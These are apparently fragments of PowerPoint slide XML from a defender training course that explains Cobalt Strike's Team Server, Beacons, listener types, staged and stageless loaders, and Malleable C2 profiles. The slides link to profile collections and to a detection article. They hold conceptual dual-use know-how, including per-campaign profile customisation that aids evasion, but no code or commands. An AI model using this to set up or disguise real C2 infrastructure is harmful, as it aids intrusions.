        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cobalt Strike Architecture &amp; Components</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Content Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA679421-9150-AF75-B53C-395846E19670}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="639024" y="1556240"/>
            <a:ext cx="6258165" cy="4966480"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Beacons </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> Team Server C2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> CS Client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Team Server (TS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>The core CS C2 server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Provides payload generation, multi-user coordination, reporting features, and handlers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Often setup in cloud/VPS space</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Client </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Allows operator(s) to connect to the Team Server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Beacon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Primary payload that runs on target host(s) and communicates with TS C2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Cobalt Strike manual is AWESOME</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0"/>
              <a:t>for528.com/cs-guide </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{605A01E9-DDD6-98C4-9EBA-CEB2FCB1E47C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11537950" y="6311900"/>
            <a:ext cx="654050" cy="546100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219080"/>
            <a:fld id="{A12C446D-6113-E749-B2D6-33109B9D4DC9}" type="slidenum">
              <a:rPr lang="en-US" kern="0" smtClean="0"/>
              <a:pPr defTabSz="1219080"/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" kern="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{129EB135-B874-FED4-CC2F-9DD178625950}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7239152" y="5862884"/>
            <a:ext cx="1939492" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>HelpSystems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, 2022</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7BEBE32-9A87-3ECD-A9A5-E0D3AD27C03C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7297278" y="1403244"/>
            <a:ext cx="4216288" cy="4427102"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="728881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40833-4B0C-4390-9CFF-9D018BEB51DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CS Client &lt;-&gt; Server Communications</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>See </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>for528.com/cs-components</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88003D2C-4926-4D70-8282-105B96790DF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="149719" y="1317011"/>
            <a:ext cx="6228944" cy="4341813"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Listeners</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Listeners are the component within the Team Server to which Beacons connect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Similar to “handlers” in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>MetaSploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Types:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HTTP/HTTPS, DNS, SMB, &amp; Raw TCP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Staged vs. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Stageless</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Staged: Beacon loader includes enough code to download the full beacon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Stageless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Loader includes the full beacon code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E75B5B06-6565-50C0-E9DA-E7A9D6C0F664}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6570663" y="1317011"/>
            <a:ext cx="5621337" cy="5368925"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" baseline="0" dirty="0">
                <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Loaders</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" baseline="0" dirty="0">
              <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" baseline="0" dirty="0">
                <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The Team Server can generate various types of loaders, which load the specified beacon payload into memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" b="1"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B9AA7C9A-7D31-8E77-0208-28FCD1C7D586}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1794467" y="4572339"/>
            <a:ext cx="3939073" cy="2148585"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E756B968-1B91-CD56-BF1A-793DC74A3BC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7106758" y="4514237"/>
            <a:ext cx="3703097" cy="1743074"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{222BFD8F-6AD0-104E-CB08-04D4C1F274F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6924378" y="2653383"/>
            <a:ext cx="4913906" cy="1676405"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42076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06F2-AD9A-497E-84CC-809A030D1332}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Malleable C2 Profiles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{997DF3E7-CE66-4938-B4A1-48C771B474E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Malleable C2 Profiles allow users to differentiate the manner in which Beacons communicate with the Team Server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Profiles are highly customizable (and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>should </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>be customized per campaign)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Focus on the “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>SpawnTo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>” process setting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Designates the process to spawn and then replace with the Beacon’s code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42118918-85AB-7E22-0DD8-4EB088CAC88D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="0" cy="0"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BB9A490-138C-F3F7-64B9-C098AF5C3BDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="809712" y="3689947"/>
            <a:ext cx="9457240" cy="2430991"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2303729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06F2-AD9A-497E-84CC-809A030D1332}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Malleable C2 Profile Resources</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{997DF3E7-CE66-4938-B4A1-48C771B474E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Check out Jeff “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bluescreenofjeff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>” Dimmock’s article “How to Write Malleable C2 Profiles for Cobalt Strike”, which details how to write a Malleable C2 Profile from scratch: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>for528.com/writemalleablec2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>For one of the better GitHub repos consisting of many profiles, see BC Security’s “Malleable-C2-Profiles” repo: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>for528.com/cs-profiles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>For another large list of Malleable C2 profiles, see Michael Haag’s “malleable_c2_profiles” GitHub Gist: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>for528.com/cs-profiles2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Palo Alto’s Unit42 wrote an article entitled “Cobalt Strike Analysis and Tutorial: How Malleable C2 Profiles Make Cobalt Strike Difficult to Detect” that denotes all the ways in which the Malleable C2 options make detecting CS difficult. You can find their article here: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>for528.com/cs-profiles3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>The screenshot you see is from the “Amazon browsing traffic profile,” the full version of which you can find here: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>for528.com/cs-profile-amazon</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42118918-85AB-7E22-0DD8-4EB088CAC88D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="0" cy="0"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1552118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906F2-AD9A-497E-84CC-809A030D1332}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
